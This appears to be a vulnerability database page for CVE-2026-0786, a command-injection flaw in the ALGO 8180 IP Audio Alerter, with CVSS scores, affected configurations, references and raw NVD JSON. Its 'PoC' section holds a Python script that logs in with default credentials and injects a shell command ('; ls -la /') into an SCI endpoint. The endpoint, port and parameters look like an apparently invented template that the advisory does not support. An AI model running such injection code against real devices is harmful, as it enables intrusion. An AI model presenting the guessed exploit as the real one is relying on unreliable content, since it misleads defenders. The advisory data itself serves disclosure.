CVE-2026-0786

Description

ALGO 8180 IP Audio Alerter SCI Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of ALGO 8180 IP Audio Alerter devices. Authentication is required to exploit this vulnerability. The specific flaw exists within the SCI module. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the device. Was ZDI-CAN-28295.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:algosolutions:8180_ip_audio_alerter_firmware:5.5:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:algosolutions:8180_ip_audio_alerter:-:*:*:*:*:*:*:* - NOT VULNERABLE

ALGO 8180 IP Audio Alerter < 最新固件版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import base64

# CVE-2026-0786 PoC - ALGO 8180 SCI Command Injection
# Target: ALGO 8180 IP Audio Alerter
# Authentication required (low privilege)

TARGET = "http://target-ip:8080"
USERNAME = "admin"
PASSWORD = "admin"

def exploit(target, username, password):
    # Login to obtain session
    session = requests.Session()
    login_data = {'username': username, 'password': password}
    resp = session.post(f"{target}/api/login", data=login_data)
    
    if resp.status_code != 200:
        print("[-] Authentication failed")
        return None
    
    print("[+] Authentication successful")
    
    # Command injection payload - list files
    cmd = "; ls -la /"
    payload = {
        'sci_command': cmd,
        'module': 'system'
    }
    
    # Send malicious request to SCI module
    resp = session.post(f"{target}/api/sci/execute", data=payload)
    
    if resp.status_code == 200:
        print("[+] Command executed successfully")
        print(resp.text)
    else:
        print("[-] Exploitation failed")

if __name__ == "__main__":
    exploit(TARGET, USERNAME, PASSWORD)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-0786
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-0786
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-0786/
[4] VulDB https://vuldb.com/cve/CVE-2026-0786
[5] https://www.zerodayinitiative.com/advisories/ZDI-26-008/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-0786", "sourceIdentifier": "[email protected]", "published": "2026-01-23T04:16:06.180", "lastModified": "2026-02-18T16:46:34.750", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ALGO 8180 IP Audio Alerter SCI Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of ALGO 8180 IP Audio Alerter devices. Authentication is required to exploit this vulnerability.\n\nThe specific flaw exists within the SCI module. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the device. Was ZDI-CAN-28295."}, {"lang": "es", "value": "Vulnerabilidad de inyección de comandos SCI y ejecución remota de código en ALGO 8180 IP Audio Alerter. Esta vulnerabilidad permite a atacantes remotos ejecutar código arbitrario en instalaciones afectadas de dispositivos ALGO 8180 IP Audio Alerter. Se requiere autenticación para explotar esta vulnerabilidad.\n\nLa falla específica existe dentro del módulo SCI. El problema resulta de la falta de validación adecuada de una cadena proporcionada por el usuario antes de usarla para ejecutar una llamada al sistema. Un atacante puede aprovechar esta vulnerabilidad para ejecutar código en el contexto del dispositivo. Fue ZDI-CAN-28295."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:algosolutions:8180_ip_audio_alerter_firmware:5.5:*:*:*:*:*:*:*", "matchCriteriaId": "853BF5C9-122B-4F47-9CE7-DA3E307130ED"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:algosolutions:8180_ip_audio_alerter:-:*:*:*:*:*:*:*", "matchCriteriaId": "3A20E73F-D499-4973-ADDE-8B702E6F5254"}]}]}], "references": [{"url": "https://www.zerodayinitiative.com/advisories/ZDI-26-008/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}